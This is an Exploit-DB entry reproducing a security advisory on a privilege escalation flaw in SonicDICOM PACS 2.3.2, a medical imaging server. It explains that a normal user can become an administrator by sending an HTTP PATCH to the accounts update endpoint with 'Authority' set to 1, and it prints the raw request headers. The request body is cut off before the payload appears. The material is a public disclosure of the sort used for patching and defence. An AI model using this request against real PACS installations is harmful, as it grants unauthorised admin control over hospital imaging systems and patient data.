SonicDICOM PACS 2.3.2 - Privilege Escalation

ID EDB-ID:41311
Type exploitdb
Reporter Exploit-DB
Modified 2017-02-11T00:00:00


SonicDICOM PACS 2.3.2 - Privilege Escalation. Webapps exploit for Windows platform

                                            SonicDICOM PACS 2.3.2 Remote Vertical Privilege Escalation Exploit

Vendor: JIUN Corporation
Product web page:
Affected version: 2.3.2 and 2.3.1

Summary: SonicDICOM is PACS software that combines the capabilities of
DICOM Server with web browser based DICOM Viewer.

Desc: The application suffers from a privilege escalation vulnerability.
Normal user can elevate his/her privileges by sending a HTTP PATCH request
seting the parameter 'Authority' to integer value '1' gaining admin rights.

Tested on: Microsoft-HTTPAPI/2.0

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

Advisory ID: ZSL-2017-5396
Advisory URL:



PATCH /viewer/api/accounts/update HTTP/1.1
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Escalation Browser/1.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close